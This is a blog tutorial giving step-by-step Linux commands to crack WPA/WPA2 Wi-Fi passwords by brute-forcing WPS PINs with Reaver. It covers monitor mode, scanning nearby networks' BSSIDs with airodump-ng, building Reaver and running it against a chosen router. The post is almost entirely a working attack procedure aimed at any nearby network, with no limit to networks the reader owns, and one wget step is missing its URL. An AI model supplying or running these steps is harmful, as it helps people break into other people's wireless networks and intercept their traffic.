How to Crack WPA/WPA2 without a dictionary in 4-10 hours with Reaver

The reign of secure WPA/WPA2 network encryption is now over. It no longer takes decades to crack thanks to Tactical Network Solutions. Their brilliant team have found a weakness in WPA that lets an attacker bruteforce against Wifi Protected Setup (WPS) PINS in order to then recover the WPA/WPA2 key. We'll be using a tool which exploits this bug called reaver.

I will take you through how this is done on a Linux machine, specifically Ubuntu!
Using the terminal:

1. Download aircrack-ng:

sudo apt-get install aircrack-ng

2. Put Wifi adapter into monitor mode:

sudo airmon-ng start wlan0

3. Use airodump-ng to scan for WPA/WPA2 encrypted network BSSIDs:
sudo airodump-ng mon0
 4. <crtl+c> after a few seconds or once a list of BSSIDs has populated, it should look like this:

The BSSIDs are listed on the left, these are the IDs for the various surrounding networks. Pick one which is WPA/WPA2 and uses a Public Shared Key (PSK).

Don't close this terminal, open up a new terminal and use this now instead. 

sudo apt-get install libsqlite3-dev && wget && tar xfvz reaver-1.4.tar.gz && cd reaver-1.4/src/ && ./configure && make && sudo make install
5. Download and install libsqlite3-dev:
sudo apt-get install libsqlite3-dev
 6. Download reaver:
7. Extract reaver tar.gz file:
tar xfvz reaver-1.4.tar.gz
8. Install reaver:
cd reaver-1.4/src/ && ./configure && make && sudo make install
9. Get cracking! Copy the BSSID you chose from the other open terminal and enter it in like this:
sudo reaver -i mon0 -b <paste BSSID here!!> -vv
-i mon0 = use the mon0 interface which is your wifi adapter in monitor mode.
-b "some BSSID" = the router to crack.
-vv = give very verbose output.
10. Now wait from around 4-10 hours as it cracks the network key!

Do you have questions, comments, or suggestions? Feel free to post a comment! 

Subscribe to Saint Andrew's Paradise
Liked this post?
Subscribe to "Saint Andrew's Paradise" and get all new tricks, tools and regular updates to your inbox!


Share your views...

1 Respones to "How to Crack WPA/WPA2 without a dictionary in 4-10 hours with Reaver"

Anonymous said...
August 9, 2012 at 3:34 PM


Post a Comment


About Me

Saint Andrew is a computer science student. Saint Andrew is a founder of the blog Saint Andrew's Hacking Paradise.

His mission and the aim of this blog is to make the reader aware of the existing threats and describe them in comprehensible way.

"Saint Andrew's Hacking Paradise" is a place to Learn, Understand and Explore the facts of computer technology.

You are always welcome to contact us to suggest ideas, tips, or to ask questions.

© 2011 Saint Andrew's Hacking Paradise

This blog run on iThesis Theme & hosted by Blogger